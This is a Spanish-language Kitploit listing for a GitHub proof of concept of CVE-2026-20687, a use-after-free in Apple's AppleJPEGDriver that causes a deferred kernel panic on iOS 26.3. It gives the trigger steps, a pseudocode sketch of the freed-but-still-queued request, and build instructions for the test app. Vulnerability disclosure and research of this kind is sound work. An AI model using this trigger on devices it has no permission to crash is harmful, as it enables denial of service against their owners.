Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-20687-AppleJPEGDriver-UAF — CVE-2026-20687: AppleJPEGDriver startDecoder Timeout UAF — vulnerabilidad del kernel de iOS/macOS que provoca un pánico diferido (A19 Pro, iOS 26.3 RC) | Kitploit
Herramientas/GitHubGitHub/0xjohnnydev/cve-2026-20687-applejpegdriver-uaf
Seguridad iOSAnálisis de VulnerabilidadesExplotaciónSeguridad MóvilExplotación de Binarios
GitHub0xjohnnydev/cve-2026-20687-applejpegdriver-uaf

CVE-2026-20687-AppleJPEGDriver-UAF

CVE-2026-20687: AppleJPEGDriver startDecoder Timeout UAF — vulnerabilidad del kernel de iOS/macOS que provoca un pánico diferido (A19 Pro, iOS 26.3 RC)

Ver Repositorio

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Sitio web
193hace 4 mesesAún no revisado
Compartir

CVE-2026-20687: AppleJPEGDriver startDecoder() Timeout UAF (pánico diferido)

CVE-2026-20687 | Autor: Johnny Franks (@zeroxjf)

Componente: Kernel

Impacto: Una app podría provocar la terminación inesperada del sistema o escribir en la memoria del kernel

Descripción: Se solucionó un problema de use after free con una mejor gestión de la memoria.

— Contenido de seguridad de Apple, iOS 26.4 y iPadOS 26.4

Esto provocará un pánico del kernel en tu dispositivo. Guarda tu trabajo.

Probado en iOS 26.3 (23D125) en iPhone18,2 (iPhone 17 Pro Max, A19 Pro).

Disparador

Disparo directo:

  1. Ejecuta el PoC y toca Panic (prepara el driver / pone en cola trabajo asíncrono).
  2. Luego abre Camera (esto provoca de forma fiable una decodificación JPEG síncrona + timeout en la compilación afectada).
  3. La ruta de timeout libera una solicitud pero deja su puntero de nodo de cola incrustado en el vector por códec.
  4. Un recorrido posterior de la cola desreferencia el nodo obsoleto y el kernel entra en pánico (fallo de verificación de etiqueta MTE).
root@kitploit:~
// PoC: prepara el driver; el pánico suele diferirse hasta que se abre Camera.
IOServiceOpen("AppleJPEGDriver");
for (int i = 0; i < N; i++) {
  startDecoder_async();                   // queue_io_gated(): vector.push(req + 0x78)
}
IOServiceClose(conn);

// Más tarde, abrir Camera dispara:
startDecoder_sync();
  queue_io_gated(): vector.push(req + 0x78);
  wait(10s) -> TIMEOUT;
  pool_free(req);                         // BUG: NO saca de la cola (req + 0x78)

// Aún más tarde (finish_io_gated):
fullSpeedRequestExist():
  node_ptr = vector[i];                   // obsoleto: node_ptr == (req + 0x78 liberado)
  req2 = *(node_ptr + 0x8);              // lectura UAF de req+0x80 -> fallo de etiqueta MTE -> pánico

Compilar y ejecutar

  1. Abre ios-app/Test.xcodeproj en Xcode
  2. Selecciona tu dispositivo iOS (el simulador no es útil)
  3. Compila y ejecuta
  4. Toca el botón Panic
  5. Abre la app Camera para disparar el pánico diferido
Descargar herramienta